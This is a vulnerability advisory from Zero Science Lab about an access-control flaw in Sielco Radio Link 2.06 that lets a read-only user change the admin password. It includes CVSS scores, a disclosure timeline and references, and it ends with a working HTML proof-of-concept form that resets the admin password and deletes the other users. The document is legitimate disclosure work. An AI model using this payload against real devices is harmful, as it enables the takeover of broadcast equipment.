CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
18.6%
Title: Sielco Radio Link 2.06 Improper Access Control Change Admin Password
Advisory ID: ZSL-2023-5760
Type: Local/Remote
Impact: Security Bypass
Risk: (4/5)
Release Date: 30.03.2023
Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.
The application suffers from improper access control when editing users. A user with Read permissions can manipulate users, passwords and permissions by sending a single HTTP POST request with modified parameters and edit other users’ names, passwords and permissions including admin password.
Sielco S.r.l - <https://www.sielco.org>
2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)
lwIP/2.1.1
Web/2.9.3
[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://packetstormsecurity.com/files/171847/>
[2] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[3] <https://vulners.com/cve/CVE-2023-45228>
[4] <https://nvd.nist.gov/vuln/detail/CVE-2023-45228>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253070>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269708>
[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<!--
Sielco Radio Link 2.06 Improper Access Control Change Admin Password
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)
Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.
Desc: The application suffers from improper access control when editing
users. A user with Read permissions can manipulate users, passwords and
permissions by sending a single HTTP POST request with modified parameters
and edit other users' names, passwords and permissions including admin
password.
Tested on: lwIP/2.1.1
Web/2.9.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5760
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php
26.01.2023
--><html>
<body>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="pwd0bis" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="user1" type="hidden" value=""/> <!-- This will set/modify user1 -->
<input name="pwd1" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="pwd1bis" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="auth1" type="hidden" value="0"/> <!-- This will set user1 read perm -->
<input name="user2" type="hidden" value=""/> <!-- This will set/modify user2 -->
<input name="pwd2" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="pwd2bis" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="auth2" type="hidden" value="0"/> <!-- This will set user2 read perm -->
<input name="user3" type="hidden" value=""/> <!-- This will set/modify user3 -->
<input name="pwd3" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="pwd3bis" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="auth3" type="hidden" value="0"/> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users"/>
</form>
</body>
</html>